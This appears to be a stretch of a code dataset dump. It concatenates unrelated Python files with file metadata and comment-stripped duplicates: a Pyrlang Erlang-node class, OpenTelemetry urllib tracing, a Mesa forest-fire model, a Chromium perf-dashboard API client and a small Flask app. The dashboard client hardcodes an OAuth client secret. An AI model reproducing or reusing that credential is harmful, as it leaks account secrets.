this_node=self,
remote_node=receiver_node)
if handler is None:
raise NodeException("Node not connected %s" % receiver_node)
# block until connected, and get the connected message
LOG("Node: wait for 'node_connected'")
# msg = self.inbox_.receive_wait(
# filter_fn=lambda m: m[0] == 'node_connected'
# )
while receiver_node not in self.dist_nodes_:
gevent.sleep(0.1)
LOG("Node: connected")
conn = self.dist_nodes_[receiver_node]
conn.inbox_.put(message)
def monitor_process(self, origin, target):
""" Locate the process referenced by the target and place the origin
pid into its ``monitors_`` collection. When something happens to the
``target``, a special message will be sent to the ``origin``.
:type origin: Pid
:param origin: The (possibly remote) process who will be monitoring
the target from now
:type target: Pid or Atom
:param target: Name or pid of a monitor target process
"""
target_proc = self.where_is(target)
LOG("MonitorP: orig=%s targ=%s -> %s" % (origin, target, target_proc))
if target_proc is not None:
target_proc.monitors_.add(origin)
else:
msg = "Monitor target %s does not exist" % target
raise NodeException(msg)
# if the origin is local, register monitor in it
if origin.is_local_to(self):
origin_p = self.where_is(origin)
origin_p.monitor_targets_.add(target_proc.pid_)
def demonitor_process(self, origin, target):
""" Locate the process ``target`` and remove the ``origin`` from its
``monitors_`` collection. This does not trigger any notifications
or signals to the ``origin``.
:type origin: Pid
:param origin: The process who was monitoring the target previously
:type target: Pid or Atom
:param target: Name or pid of a monitor target process, possibly
it does not exist
"""
target_proc = self.where_is(target)
if target_proc is not None:
target_proc.monitors_.discard(origin)
else:
msg = "Demonitor target %s does not exist" % target
raise NodeException(msg)
# if the origin is local, unregister monitor from it
if origin.is_local_to(self):
origin_p = self.where_is(origin)
origin_p.monitor_targets_.discard(target_proc.pid_)
__all__ = ['Node', 'NodeException']
| 38.048518 | 97 | 0.602295 |
from __future__ import print_function
import gevent
from gevent import Greenlet
from typing import Dict, Union
from Pyrlang import logger, mailbox
from Pyrlang.Term import *
from Pyrlang.Dist.distribution import ErlangDistribution
from Pyrlang.Dist.node_opts import NodeOpts
from Pyrlang.process import Process
LOG = logger.tty
DEBUG = logger.nothing
WARN = logger.nothing
ERROR = logger.tty
class NodeException(Exception):
pass
class Node(Greenlet):
singleton = None
def __init__(self, name: str, cookie: str) -> None:
Greenlet.__init__(self)
if Node.singleton is not None:
raise NodeException("Singleton Node was already created")
Node.singleton = self
self.inbox_ = mailbox.Mailbox()
self.pid_counter_ = 0
self.processes_ = {}
self.reg_names_ = {}
self.is_exiting_ = False
self.node_opts_ = NodeOpts(cookie=cookie)
self.name_ = Atom(name)
self.dist_nodes_ = {}
self.dist_ = ErlangDistribution(node=self, name=name)
self.dist_.connect(self)
from Pyrlang.rex import Rex
self.rex_ = Rex(self)
self.rex_.start()
from Pyrlang.net_kernel import NetKernel
self.net_kernel_ = NetKernel(self)
self.net_kernel_.start()
def _run(self):
while not self.is_exiting_:
self.handle_inbox()
gevent.sleep(0.0)
def handle_inbox(self):
while True:
msg = self.inbox_.get()
if msg is None:
break
self.handle_one_inbox_message(msg)
def handle_one_inbox_message(self, m: tuple):
if m[0] == 'node_connected':
(_, addr, connection) = m
self.dist_nodes_[addr] = connection
elif m[0] == 'node_disconnected':
(_, addr) = m
del self.dist_nodes_[addr]
def register_new_process(self, proc) -> Pid:
pid1 = Pid(node=self.name_,
id=self.pid_counter_ // 0x7fffffff,
serial=self.pid_counter_ % 0x7fffffff,
creation=self.dist_.creation_)
self.pid_counter_ += 1
if proc is not None:
self.processes_[pid1] = proc
return pid1
def on_exit_process(self, pid, reason):
LOG("Process %s exited with %s", pid, reason)
del self.processes_[pid]
def register_name(self, proc, name) -> None:
self.reg_names_[name] = proc.pid_
def stop(self) -> None:
self.is_exiting_ = True
self.dist_.disconnect()
def where_is(self, ident) -> Union[Process, None]:
if isinstance(ident, Atom) and ident in self.reg_names_:
ident = self.reg_names_[ident]
if isinstance(ident, Pid) and ident in self.processes_:
return self.processes_[ident]
return None
def _send_local_registered(self, receiver, message) -> None:
if not isinstance(receiver, Atom):
raise NodeException("_send_local_registered receiver must be an "
"atom")
receiver_obj = self.where_is(receiver)
if receiver_obj is not None:
LOG("Node: send local reg=%s receiver=%s msg=%s" % (receiver, receiver_obj, message))
receiver_obj.inbox_.put(message)
else:
WARN("Node: send to unregistered name %s ignored" % receiver)
def _send_local(self, receiver, message) -> None:
if not isinstance(receiver, Pid):
raise NodeException("send's receiver must be a pid")
dst = self.where_is(receiver)
if dst is not None:
DEBUG("Node._send_local: pid %s <- %s" % (receiver, message))
dst.inbox_.put(message)
else:
WARN("Node._send_local: pid %s does not exist" % receiver)
def send(self, sender, receiver, message) -> None:
DEBUG("send -> %s: %s" % (receiver, message))
if isinstance(receiver, tuple):
(r_node, r_name) = receiver
if r_node == self.name_: # atom compare
# re-route locally
return self.send(sender, r_name, message)
else:
# route remotely
return self._send_remote(sender=sender,
dst_node=str(r_node),
receiver=r_name,
message=message)
if isinstance(receiver, Pid):
if receiver.is_local_to(self):
return self._send_local(receiver, message)
else:
return self._send_remote(sender=sender,
dst_node=str(receiver.node_),
receiver=receiver,
message=message)
if isinstance(receiver, Atom):
return self._send_local_registered(receiver, message)
raise NodeException("Don't know how to send to %s" % receiver)
def _send_remote(self, sender, dst_node: str, receiver, message) -> None:
DEBUG("Node._send_remote %s <- %s" % (receiver, message))
m = ('send', sender, receiver, message)
return self.dist_command(receiver_node=dst_node,
message=m)
def get_cookie(self):
return self.node_opts_.cookie_
def dist_command(self, receiver_node: str, message: tuple) -> None:
if receiver_node not in self.dist_nodes_:
LOG("Node: connect to node", receiver_node)
handler = self.dist_.connect_to_node(
this_node=self,
remote_node=receiver_node)
if handler is None:
raise NodeException("Node not connected %s" % receiver_node)
LOG("Node: wait for 'node_connected'")
while receiver_node not in self.dist_nodes_:
gevent.sleep(0.1)
LOG("Node: connected")
conn = self.dist_nodes_[receiver_node]
conn.inbox_.put(message)
def monitor_process(self, origin, target):
target_proc = self.where_is(target)
LOG("MonitorP: orig=%s targ=%s -> %s" % (origin, target, target_proc))
if target_proc is not None:
target_proc.monitors_.add(origin)
else:
msg = "Monitor target %s does not exist" % target
raise NodeException(msg)
if origin.is_local_to(self):
origin_p = self.where_is(origin)
origin_p.monitor_targets_.add(target_proc.pid_)
def demonitor_process(self, origin, target):
target_proc = self.where_is(target)
if target_proc is not None:
target_proc.monitors_.discard(origin)
else:
msg = "Demonitor target %s does not exist" % target
raise NodeException(msg)
if origin.is_local_to(self):
origin_p = self.where_is(origin)
origin_p.monitor_targets_.discard(target_proc.pid_)
__all__ = ['Node', 'NodeException']
| true | true |
1c305748b52524a688ce7cff735634434032d6d5 | 7,147 | py | Python | instrumentation/opentelemetry-instrumentation-urllib/src/opentelemetry/instrumentation/urllib/__init__.py | toumorokoshi/opentelemetry-python-contrib | 7159372e3b381119715c99a37603b3d2d6b9ea46 | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | instrumentation/opentelemetry-instrumentation-urllib/src/opentelemetry/instrumentation/urllib/__init__.py | toumorokoshi/opentelemetry-python-contrib | 7159372e3b381119715c99a37603b3d2d6b9ea46 | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | instrumentation/opentelemetry-instrumentation-urllib/src/opentelemetry/instrumentation/urllib/__init__.py | toumorokoshi/opentelemetry-python-contrib | 7159372e3b381119715c99a37603b3d2d6b9ea46 | [
"Apache-2.0",
"BSD-3-Clause"
] | null | null | null | # Copyright The OpenTelemetry Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
This library allows tracing HTTP requests made by the
`urllib https://docs.python.org/3/library/urllib.html>`_ library.
Usage
-----
.. code-block:: python
from urllib import request
from opentelemetry.instrumentation.urllib import URLLibInstrumentor
# You can optionally pass a custom TracerProvider to
# URLLibInstrumentor().instrument()
URLLibInstrumentor().instrument()
req = request.Request('https://postman-echo.com/post', method="POST")
r = request.urlopen(req)
API
---
"""
import functools
import types
from urllib.request import ( # pylint: disable=no-name-in-module,import-error
OpenerDirector,
Request,
)
from opentelemetry import context
from opentelemetry.instrumentation.instrumentor import BaseInstrumentor
from opentelemetry.instrumentation.urllib.version import ( # pylint: disable=no-name-in-module,import-error
__version__,
)
from opentelemetry.instrumentation.utils import http_status_to_status_code
from opentelemetry.propagate import inject
from opentelemetry.trace import SpanKind, get_tracer
from opentelemetry.trace.status import Status
# A key to a context variable to avoid creating duplicate spans when instrumenting
_SUPPRESS_URLLIB_INSTRUMENTATION_KEY = "suppress_urllib_instrumentation"
class URLLibInstrumentor(BaseInstrumentor):
"""An instrumentor for urllib
See `BaseInstrumentor`
"""
def _instrument(self, **kwargs):
"""Instruments urllib module
Args:
**kwargs: Optional arguments
``tracer_provider``: a TracerProvider, defaults to global
``span_callback``: An optional callback invoked before returning the http response.
Invoked with Span and http.client.HTTPResponse
``name_callback``: Callback which calculates a generic span name for an
outgoing HTTP request based on the method and url.
Optional: Defaults to get_default_span_name.
"""
_instrument(
tracer_provider=kwargs.get("tracer_provider"),
span_callback=kwargs.get("span_callback"),
name_callback=kwargs.get("name_callback"),
)
def _uninstrument(self, **kwargs):
_uninstrument()
def uninstrument_opener(
self, opener: OpenerDirector
): # pylint: disable=no-self-use
"""uninstrument_opener a specific instance of urllib.request.OpenerDirector"""
_uninstrument_from(opener, restore_as_bound_func=True)
def get_default_span_name(method):
"""Default implementation for name_callback, returns HTTP {method_name}."""
return "HTTP {}".format(method).strip()
def _instrument(tracer_provider=None, span_callback=None, name_callback=None):
"""Enables tracing of all requests calls that go through
:code:`urllib.Client._make_request`"""
opener_open = OpenerDirector.open
@functools.wraps(opener_open)
def instrumented_open(opener, fullurl, data=None, timeout=None):
if isinstance(fullurl, str):
request_ = Request(fullurl, data)
else:
request_ = fullurl
def get_or_create_headers():
return getattr(request_, "headers", {})
def call_wrapped():
return opener_open(opener, request_, data=data, timeout=timeout)
return _instrumented_open_call(
opener, request_, call_wrapped, get_or_create_headers
)
def _instrumented_open_call(
_, request, call_wrapped, get_or_create_headers
): # pylint: disable=too-many-locals
if context.get_value("suppress_instrumentation") or context.get_value(
_SUPPRESS_URLLIB_INSTRUMENTATION_KEY
):
return call_wrapped()
method = request.get_method().upper()
url = request.full_url
span_name = ""
if name_callback is not None:
span_name = name_callback(method, url)
if not span_name or not isinstance(span_name, str):
span_name = get_default_span_name(method)
labels = {
"http.method": method,
"http.url": url,
}
with get_tracer(
__name__, __version__, tracer_provider
).start_as_current_span(span_name, kind=SpanKind.CLIENT) as span:
exception = None
if span.is_recording():
span.set_attribute("http.method", method)
span.set_attribute("http.url", url)
headers = get_or_create_headers()
inject(type(headers).__setitem__, headers)
token = context.attach(
context.set_value(_SUPPRESS_URLLIB_INSTRUMENTATION_KEY, True)
)
try:
result = call_wrapped() # *** PROCEED
except Exception as exc: # pylint: disable=W0703
exception = exc
result = getattr(exc, "file", None)
finally:
context.detach(token)
if result is not None:
code_ = result.getcode()
labels["http.status_code"] = str(code_)
if span.is_recording():
span.set_attribute("http.status_code", code_)
span.set_attribute("http.status_text", result.reason)
span.set_status(Status(http_status_to_status_code(code_)))
ver_ = str(getattr(result, "version", ""))
if ver_:
labels["http.flavor"] = "{}.{}".format(ver_[:1], ver_[:-1])
if span_callback is not None:
span_callback(span, result)
if exception is not None:
raise exception.with_traceback(exception.__traceback__)
return result
instrumented_open.opentelemetry_instrumentation_urllib_applied = True
OpenerDirector.open = instrumented_open
def _uninstrument():
"""Disables instrumentation of :code:`urllib` through this module.
Note that this only works if no other module also patches urllib."""
_uninstrument_from(OpenerDirector)
def _uninstrument_from(instr_root, restore_as_bound_func=False):
instr_func_name = "open"
instr_func = getattr(instr_root, instr_func_name)
if not getattr(
instr_func, "opentelemetry_instrumentation_urllib_applied", False,
):
return
original = instr_func.__wrapped__ # pylint:disable=no-member
if restore_as_bound_func:
original = types.MethodType(original, instr_root)
setattr(instr_root, instr_func_name, original)
| 33.553991 | 108 | 0.665454 |
import functools
import types
from urllib.request import (
OpenerDirector,
Request,
)
from opentelemetry import context
from opentelemetry.instrumentation.instrumentor import BaseInstrumentor
from opentelemetry.instrumentation.urllib.version import (
__version__,
)
from opentelemetry.instrumentation.utils import http_status_to_status_code
from opentelemetry.propagate import inject
from opentelemetry.trace import SpanKind, get_tracer
from opentelemetry.trace.status import Status
_SUPPRESS_URLLIB_INSTRUMENTATION_KEY = "suppress_urllib_instrumentation"
class URLLibInstrumentor(BaseInstrumentor):
def _instrument(self, **kwargs):
_instrument(
tracer_provider=kwargs.get("tracer_provider"),
span_callback=kwargs.get("span_callback"),
name_callback=kwargs.get("name_callback"),
)
def _uninstrument(self, **kwargs):
_uninstrument()
def uninstrument_opener(
self, opener: OpenerDirector
):
_uninstrument_from(opener, restore_as_bound_func=True)
def get_default_span_name(method):
return "HTTP {}".format(method).strip()
def _instrument(tracer_provider=None, span_callback=None, name_callback=None):
opener_open = OpenerDirector.open
@functools.wraps(opener_open)
def instrumented_open(opener, fullurl, data=None, timeout=None):
if isinstance(fullurl, str):
request_ = Request(fullurl, data)
else:
request_ = fullurl
def get_or_create_headers():
return getattr(request_, "headers", {})
def call_wrapped():
return opener_open(opener, request_, data=data, timeout=timeout)
return _instrumented_open_call(
opener, request_, call_wrapped, get_or_create_headers
)
def _instrumented_open_call(
_, request, call_wrapped, get_or_create_headers
):
if context.get_value("suppress_instrumentation") or context.get_value(
_SUPPRESS_URLLIB_INSTRUMENTATION_KEY
):
return call_wrapped()
method = request.get_method().upper()
url = request.full_url
span_name = ""
if name_callback is not None:
span_name = name_callback(method, url)
if not span_name or not isinstance(span_name, str):
span_name = get_default_span_name(method)
labels = {
"http.method": method,
"http.url": url,
}
with get_tracer(
__name__, __version__, tracer_provider
).start_as_current_span(span_name, kind=SpanKind.CLIENT) as span:
exception = None
if span.is_recording():
span.set_attribute("http.method", method)
span.set_attribute("http.url", url)
headers = get_or_create_headers()
inject(type(headers).__setitem__, headers)
token = context.attach(
context.set_value(_SUPPRESS_URLLIB_INSTRUMENTATION_KEY, True)
)
try:
result = call_wrapped()
except Exception as exc:
exception = exc
result = getattr(exc, "file", None)
finally:
context.detach(token)
if result is not None:
code_ = result.getcode()
labels["http.status_code"] = str(code_)
if span.is_recording():
span.set_attribute("http.status_code", code_)
span.set_attribute("http.status_text", result.reason)
span.set_status(Status(http_status_to_status_code(code_)))
ver_ = str(getattr(result, "version", ""))
if ver_:
labels["http.flavor"] = "{}.{}".format(ver_[:1], ver_[:-1])
if span_callback is not None:
span_callback(span, result)
if exception is not None:
raise exception.with_traceback(exception.__traceback__)
return result
instrumented_open.opentelemetry_instrumentation_urllib_applied = True
OpenerDirector.open = instrumented_open
def _uninstrument():
_uninstrument_from(OpenerDirector)
def _uninstrument_from(instr_root, restore_as_bound_func=False):
instr_func_name = "open"
instr_func = getattr(instr_root, instr_func_name)
if not getattr(
instr_func, "opentelemetry_instrumentation_urllib_applied", False,
):
return
original = instr_func.__wrapped__
if restore_as_bound_func:
original = types.MethodType(original, instr_root)
setattr(instr_root, instr_func_name, original)
| true | true |
1c305749d00f258369cbc9bc8173c8553aa12dc1 | 2,363 | py | Python | benchmark/compare/Mesa/ForestFire/model.py | Corvince/Agents.jl | 6276084756287bd0a7b1e0dc9fcf5638f9840c73 | [
"MIT"
] | null | null | null | benchmark/compare/Mesa/ForestFire/model.py | Corvince/Agents.jl | 6276084756287bd0a7b1e0dc9fcf5638f9840c73 | [
"MIT"
] | null | null | null | benchmark/compare/Mesa/ForestFire/model.py | Corvince/Agents.jl | 6276084756287bd0a7b1e0dc9fcf5638f9840c73 | [
"MIT"
] | null | null | null | from mesa import Model
from mesa import Agent
from mesa.space import Grid
from mesa.time import RandomActivation
class TreeCell(Agent):
"""
A tree cell.
Attributes:
x, y: Grid coordinates
condition: Can be "Fine", "On Fire", or "Burned Out"
unique_id: (x,y) tuple.
unique_id isn't strictly necessary here, but it's good
practice to give one to each agent anyway.
"""
def __init__(self, pos, model):
"""
Create a new tree.
Args:
pos: The tree's coordinates on the grid.
model: standard model reference for agent.
"""
super().__init__(pos, model)
self.pos = pos
self.condition = "Fine"
def step(self):
"""
If the tree is on fire, spread it to fine trees nearby.
"""
if self.condition == "On Fire":
for neighbor in self.model.grid.neighbor_iter(self.pos, moore=False):
if neighbor.condition == "Fine":
neighbor.condition = "On Fire"
self.condition = "Burned Out"
def get_pos(self):
return self.pos
class ForestFire(Model):
"""
Simple Forest Fire model.
"""
def __init__(self, height=100, width=100, density=0.7):
"""
Create a new forest fire model.
Args:
height, width: The size of the grid to model
density: What fraction of grid cells have a tree in them.
"""
# Initialize model parameters
self.height = height
self.width = width
self.density = density
# Set up model objects
self.schedule = RandomActivation(self)
self.grid = Grid(height, width, torus=False)
# Place a tree in each cell with Prob = density
for (contents, x, y) in self.grid.coord_iter():
if self.random.random() < self.density:
# Create a tree
new_tree = TreeCell((x, y), self)
# Set all trees in the first column on fire.
if x == 0:
new_tree.condition = "On Fire"
self.grid._place_agent((x, y), new_tree)
self.schedule.add(new_tree)
self.running = True
def step(self):
"""
Advance the model by one step.
"""
self.schedule.step()
| 29.5375 | 81 | 0.555226 | from mesa import Model
from mesa import Agent
from mesa.space import Grid
from mesa.time import RandomActivation
class TreeCell(Agent):
def __init__(self, pos, model):
super().__init__(pos, model)
self.pos = pos
self.condition = "Fine"
def step(self):
if self.condition == "On Fire":
for neighbor in self.model.grid.neighbor_iter(self.pos, moore=False):
if neighbor.condition == "Fine":
neighbor.condition = "On Fire"
self.condition = "Burned Out"
def get_pos(self):
return self.pos
class ForestFire(Model):
def __init__(self, height=100, width=100, density=0.7):
self.height = height
self.width = width
self.density = density
self.schedule = RandomActivation(self)
self.grid = Grid(height, width, torus=False)
for (contents, x, y) in self.grid.coord_iter():
if self.random.random() < self.density:
new_tree = TreeCell((x, y), self)
if x == 0:
new_tree.condition = "On Fire"
self.grid._place_agent((x, y), new_tree)
self.schedule.add(new_tree)
self.running = True
def step(self):
self.schedule.step()
| true | true |
1c305878f64477e32f999d42339c6c175de80bd6 | 7,580 | py | Python | experimental/soundwave/soundwave/dashboard_api.py | Ashish0125/Application-test | 0b642ec89bbc8de3d76b3cd782c2ae7bc0dc7bf2 | [
"BSD-3-Clause"
] | null | null | null | experimental/soundwave/soundwave/dashboard_api.py | Ashish0125/Application-test | 0b642ec89bbc8de3d76b3cd782c2ae7bc0dc7bf2 | [
"BSD-3-Clause"
] | null | null | null | experimental/soundwave/soundwave/dashboard_api.py | Ashish0125/Application-test | 0b642ec89bbc8de3d76b3cd782c2ae7bc0dc7bf2 | [
"BSD-3-Clause"
] | 1 | 2020-07-24T04:42:31.000Z | 2020-07-24T04:42:31.000Z | # Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import datetime
import httplib2
import json
import logging
import oauth2client.client
import oauth2client.file
from oauth2client import service_account # pylint: disable=no-name-in-module
import oauth2client.tools
import os
import urllib
from py_utils import retry_util # pylint: disable=import-error
class RequestError(OSError):
"""Exception class for errors while making a request."""
def __init__(self, request, response, content):
self.request = request
self.response = response
self.content = content
super(RequestError, self).__init__(
'%s returned HTTP Error %d: %s' % (
self.request, self.status, self.error_message))
def __reduce__(self):
# Method needed to make the exception pickleable [1], otherwise it causes
# the mutliprocess pool to hang when raised by a worker [2].
# [1]: https://stackoverflow.com/a/36342588
# [2]: https://github.com/uqfoundation/multiprocess/issues/33
return (type(self), (self.request, self.response, self.content))
@property
def status(self):
return int(self.response['status'])
@property
def json(self):
try:
return json.loads(self.content)
except StandardError:
return None
@property
def error_message(self):
try:
# Try to find error message within json content.
return self.json['error']
except StandardError:
# Otherwise fall back to entire content itself.
return self.content
class ClientError(RequestError):
"""Exception for 4xx HTTP client errors."""
pass
class ServerError(RequestError):
"""Exception for 5xx HTTP server errors."""
pass
def BuildRequestError(request, response, content):
"""Build the correct RequestError depending on the response status."""
if response['status'].startswith('4'):
error = ClientError
elif response['status'].startswith('5'):
error = ServerError
else: # Fall back to the base class.
error = RequestError
return error(request, response, content)
class PerfDashboardCommunicator(object):
REQUEST_URL = 'https://chromeperf.appspot.com/api/'
OAUTH_CLIENT_ID = (
'62121018386-h08uiaftreu4dr3c4alh3l7mogskvb7i.apps.googleusercontent.com')
OAUTH_CLIENT_SECRET = 'vc1fZfV1cZC6mgDSHV-KSPOz'
SCOPES = ['https://www.googleapis.com/auth/userinfo.email']
def __init__(self, flags):
self._credentials = None
if flags.service_account_json:
self._AuthorizeAccountServiceAccount(flags.service_account_json)
else:
self._AuthorizeAccountUserAccount(flags)
@property
def has_credentials(self):
return self._credentials and not self._credentials.invalid
def _AuthorizeAccountServiceAccount(self, json_keyfile):
"""Used to create service account credentials for the dashboard.
Args:
json_keyfile: Path to json file that contains credentials.
"""
self._credentials = (
service_account.ServiceAccountCredentials.from_json_keyfile_name(
json_keyfile, self.SCOPES))
def _AuthorizeAccountUserAccount(self, flags):
"""Used to create user account credentials for the performance dashboard.
Args:
flags: An argparse.Namespace as returned by argparser.parse_args; in
addition to oauth2client.tools.argparser flags should also have set a
user_credentials_json flag.
"""
store = oauth2client.file.Storage(flags.user_credentials_json)
if os.path.exists(flags.user_credentials_json):
self._credentials = store.locked_get()
if not self.has_credentials:
flow = oauth2client.client.OAuth2WebServerFlow(
self.OAUTH_CLIENT_ID, self.OAUTH_CLIENT_SECRET, self.SCOPES,
access_type='offline', include_granted_scopes='true',
prompt='consent')
self._credentials = oauth2client.tools.run_flow(flow, store, flags)
@retry_util.RetryOnException(ServerError, retries=3)
def _MakeApiRequest(self, request, params=None, retries=None):
"""Used to communicate with perf dashboard.
Args:
request: String with the API endpoint to which the request is made.
params: A dictionary with parameters for the request.
retries: Number of times to retry in case of server errors.
Returns:
Contents of the response from the dashboard.
"""
del retries # Handled by the decorator.
assert self.has_credentials
url = self.REQUEST_URL + request
if params:
url = '%s?%s' % (url, urllib.urlencode(params))
http = httplib2.Http()
if self._credentials.access_token_expired:
self._credentials.refresh(http)
http = self._credentials.authorize(http)
logging.info('Making API request: %s', url)
resp, content = http.request(
url, method='POST', headers={'Content-length': 0})
if resp['status'] != '200':
raise BuildRequestError(url, resp, content)
return json.loads(content)
def ListTestPaths(self, test_suite, sheriff):
"""Lists test paths for the given test_suite.
Args:
test_suite: String with test suite (benchmark) to get paths for.
sheriff: Include only test paths monitored by the given sheriff rotation,
use 'all' to return all test pathds regardless of rotation.
Returns:
A list of test paths. Ex. ['TestPath1', 'TestPath2']
"""
return self._MakeApiRequest(
'list_timeseries/%s' % test_suite, {'sheriff': sheriff})
def GetTimeseries(self, test_path, days=30):
"""Get timeseries for the given test path.
Args:
test_path: test path to get timeseries for.
days: Number of days to get data points for.
Returns:
A dict in the format:
{'revision_logs':{
r_commit_pos: {... data ...},
r_chromium_rev: {... data ...},
...},
'timeseries': [
[revision, value, timestamp, r_commit_pos, r_webkit_rev],
...
],
'test_path': test_path}
or None if the test_path is not found.
"""
try:
return self._MakeApiRequest(
'timeseries/%s' % urllib.quote(test_path), {'num_days': days})
except ClientError as exc:
if 'Invalid test_path' in exc.json['error']:
return None
else:
raise
def GetBugData(self, bug_ids):
"""Yields data for a given bug id or sequence of bug ids."""
if not hasattr(bug_ids, '__iter__'):
bug_ids = [bug_ids]
for bug_id in bug_ids:
yield self._MakeApiRequest('bugs/%d' % bug_id)
def IterAlertData(self, test_suite, sheriff, days=30):
"""Returns alerts for the given test_suite.
Args:
test_suite: String with test suite (benchmark) to get paths for.
sheriff: Include only test paths monitored by the given sheriff rotation,
use 'all' to return all test pathds regardless of rotation.
days: Only return alerts which are at most this number of days old.
Yields:
Data for all requested alerts in chunks.
"""
min_timestamp = datetime.datetime.now() - datetime.timedelta(days=days)
params = {
'test_suite': test_suite,
'min_timestamp': min_timestamp.isoformat(),
'limit': 1000,
}
if sheriff != 'all':
params['sheriff'] = sheriff
while True:
response = self._MakeApiRequest('alerts', params)
yield response
if 'next_cursor' in response:
params['cursor'] = response['next_cursor']
else:
return
| 32.532189 | 80 | 0.683905 |
import datetime
import httplib2
import json
import logging
import oauth2client.client
import oauth2client.file
from oauth2client import service_account
import oauth2client.tools
import os
import urllib
from py_utils import retry_util
class RequestError(OSError):
def __init__(self, request, response, content):
self.request = request
self.response = response
self.content = content
super(RequestError, self).__init__(
'%s returned HTTP Error %d: %s' % (
self.request, self.status, self.error_message))
def __reduce__(self):
return (type(self), (self.request, self.response, self.content))
@property
def status(self):
return int(self.response['status'])
@property
def json(self):
try:
return json.loads(self.content)
except StandardError:
return None
@property
def error_message(self):
try:
return self.json['error']
except StandardError:
return self.content
class ClientError(RequestError):
pass
class ServerError(RequestError):
pass
def BuildRequestError(request, response, content):
if response['status'].startswith('4'):
error = ClientError
elif response['status'].startswith('5'):
error = ServerError
else:
error = RequestError
return error(request, response, content)
class PerfDashboardCommunicator(object):
REQUEST_URL = 'https://chromeperf.appspot.com/api/'
OAUTH_CLIENT_ID = (
'62121018386-h08uiaftreu4dr3c4alh3l7mogskvb7i.apps.googleusercontent.com')
OAUTH_CLIENT_SECRET = 'vc1fZfV1cZC6mgDSHV-KSPOz'
SCOPES = ['https://www.googleapis.com/auth/userinfo.email']
def __init__(self, flags):
self._credentials = None
if flags.service_account_json:
self._AuthorizeAccountServiceAccount(flags.service_account_json)
else:
self._AuthorizeAccountUserAccount(flags)
@property
def has_credentials(self):
return self._credentials and not self._credentials.invalid
def _AuthorizeAccountServiceAccount(self, json_keyfile):
self._credentials = (
service_account.ServiceAccountCredentials.from_json_keyfile_name(
json_keyfile, self.SCOPES))
def _AuthorizeAccountUserAccount(self, flags):
store = oauth2client.file.Storage(flags.user_credentials_json)
if os.path.exists(flags.user_credentials_json):
self._credentials = store.locked_get()
if not self.has_credentials:
flow = oauth2client.client.OAuth2WebServerFlow(
self.OAUTH_CLIENT_ID, self.OAUTH_CLIENT_SECRET, self.SCOPES,
access_type='offline', include_granted_scopes='true',
prompt='consent')
self._credentials = oauth2client.tools.run_flow(flow, store, flags)
@retry_util.RetryOnException(ServerError, retries=3)
def _MakeApiRequest(self, request, params=None, retries=None):
del retries
assert self.has_credentials
url = self.REQUEST_URL + request
if params:
url = '%s?%s' % (url, urllib.urlencode(params))
http = httplib2.Http()
if self._credentials.access_token_expired:
self._credentials.refresh(http)
http = self._credentials.authorize(http)
logging.info('Making API request: %s', url)
resp, content = http.request(
url, method='POST', headers={'Content-length': 0})
if resp['status'] != '200':
raise BuildRequestError(url, resp, content)
return json.loads(content)
def ListTestPaths(self, test_suite, sheriff):
return self._MakeApiRequest(
'list_timeseries/%s' % test_suite, {'sheriff': sheriff})
def GetTimeseries(self, test_path, days=30):
try:
return self._MakeApiRequest(
'timeseries/%s' % urllib.quote(test_path), {'num_days': days})
except ClientError as exc:
if 'Invalid test_path' in exc.json['error']:
return None
else:
raise
def GetBugData(self, bug_ids):
if not hasattr(bug_ids, '__iter__'):
bug_ids = [bug_ids]
for bug_id in bug_ids:
yield self._MakeApiRequest('bugs/%d' % bug_id)
def IterAlertData(self, test_suite, sheriff, days=30):
min_timestamp = datetime.datetime.now() - datetime.timedelta(days=days)
params = {
'test_suite': test_suite,
'min_timestamp': min_timestamp.isoformat(),
'limit': 1000,
}
if sheriff != 'all':
params['sheriff'] = sheriff
while True:
response = self._MakeApiRequest('alerts', params)
yield response
if 'next_cursor' in response:
params['cursor'] = response['next_cursor']
else:
return
| true | true |
1c305941578efa97a3feb50a111824a9e892608b | 833 | py | Python | back/run.py | xiaomogui/json-databook | f7909ef1dafb76c719521cfddfdaccf847723fec | [
"Apache-2.0"
] | null | null | null | back/run.py | xiaomogui/json-databook | f7909ef1dafb76c719521cfddfdaccf847723fec | [
"Apache-2.0"
] | null | null | null | back/run.py | xiaomogui/json-databook | f7909ef1dafb76c719521cfddfdaccf847723fec | [
"Apache-2.0"
] | null | null | null | from flask import Flask, request
from flask_cors import CORS
from routes.WorkspaceRoute import workspaceRoute
from routes.BookshelfRoute import bookshelfRoute
from routes.DatabookRoute import databookRoute
app = Flask(__name__)
app.config.update(RESTFUL_JSON=dict(ensure_ascii=False))
CORS(app, resources=r'/*')
@app.route('/')
def index():
path = request.args.get("path")
print(path)
return "it's a directory"
@app.route('/get-chess')
def getChess():
path = request.args.get("path")
return "getChess"
@app.route('/img/upload', methods=['POST'])
def send_img():
f = request.files['file']
imgData = f.read()
return imgData
app.register_blueprint(workspaceRoute)
app.register_blueprint(bookshelfRoute)
app.register_blueprint(databookRoute)
if __name__ == '__main__':
app.run(host="0.0.0.0") | 23.138889 | 56 | 0.729892 | from flask import Flask, request
from flask_cors import CORS
from routes.WorkspaceRoute import workspaceRoute
from routes.BookshelfRoute import bookshelfRoute
from routes.DatabookRoute import databookRoute
app = Flask(__name__)
app.config.update(RESTFUL_JSON=dict(ensure_ascii=False))
CORS(app, resources=r'/*')
@app.route('/')
def index():
path = request.args.get("path")
print(path)
return "it's a directory"
@app.route('/get-chess')
def getChess():
path = request.args.get("path")
return "getChess"
@app.route('/img/upload', methods=['POST'])
def send_img():
f = request.files['file']
imgData = f.read()
return imgData
app.register_blueprint(workspaceRoute)
app.register_blueprint(bookshelfRoute)
app.register_blueprint(databookRoute)
if __name__ == '__main__':
app.run(host="0.0.0.0") | true | true |
1c30595d970ec0fefb3b06125454384f8076b5fb | 1,758 | py | Python | internal/notes/builtin-SAVE/packages/py-unittest2py3k/package.py | HPCToolkit/hpctest | 5ff4455582bf39e75530a31badcf6142081b386b | [
"BSD-3-Clause"
